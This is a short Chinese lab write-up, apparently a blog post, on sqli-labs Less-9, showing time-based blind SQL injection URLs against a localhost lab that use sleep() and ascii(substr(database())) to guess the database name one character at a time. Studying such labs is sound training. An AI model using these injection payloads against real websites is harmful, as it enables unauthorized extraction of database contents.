【sqli-labs】 less9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)
加and
http://localhost/sqli/Less-9/?id=1' and '1'='1%23
http://localhost/sqli/Less-9/?id=1' and '1'='2%23
页面没有变化,一瞬间没弄懂了,看了下源码
发现无论查询的结果是什么,显示都不会有区别
学习一个函数
sleep(n) 休眠n秒
5秒后出现结果
和less8一样是盲注漏洞,构造请求
如果数据库名的第一个字符的ascii码不等于114 则休眠5s
http://localhost/sqli/Less-9/?id=1' and if(ascii(substr(database(),1,1))=114, 0, sleep(5))%23
浏览器状态栏显示
=115时没有延时,可以推测第一个字符为 's'
http://localhost/sqli/Less-9/?id=1' and if(ascii(substr(database(),1,1))=115, 0, sleep(5))%23
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步